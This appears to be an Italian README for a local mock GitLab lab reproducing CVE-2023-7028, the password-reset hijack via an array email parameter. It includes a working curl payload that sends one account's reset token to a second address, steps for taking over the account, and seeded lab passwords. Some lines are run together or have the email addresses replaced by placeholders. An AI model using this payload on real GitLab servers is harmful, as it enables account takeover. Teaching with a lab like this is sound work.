
# Istanza GitLab vulnerabile simulata che riproduce il dirottamento del reset della password CVE-2023-7028 Dimostra lo sfruttamento del parametro email basato su array e il furto dell'account. Solo per uso didattico in laboratorio.
CVE-2023-7028 (CVSS 10.0): POST /users/password accettava l'array user[email][] — il server trovava l'utente tramite email[0] ma inviava lo stesso token di reset a ogni indirizzo → un attaccante con [email protected] dirotta [email protected].
Interessati: GitLab CE/EE <16.5.6, <16.6.4, <16.7.2. Questo mock riproduce il flusso vulnerabile della 16.6.0 (DB JSON, nessun SMTP).
npm install && npm start → http://127.0.0.1:3000 (oppure PORT=3001 npm start; riprova automaticamente se occupato; solo localhost).
Dati preimpostati: [email protected]/s3cur3P@ss!, , in .
[email protected]/BobSecure1![email protected]/5iveL!fedata/users.jsoncurl -X POST http://127.0.0.1:3000/users/password -d "user[email][][email protected]&user[email][][email protected]"
Controlla http://127.0.0.1:3000/mailbox o /api/emails — entrambi ricevono lo stesso token. Apri .../users/password/edit?reset_password_token=TOKEN per prendere il controllo.
Normale: user[email][email protected] → una sola mail. La mailbox mostra ogni mail; nulla esce dall'host.
MIT — solo laboratorio, non esporre.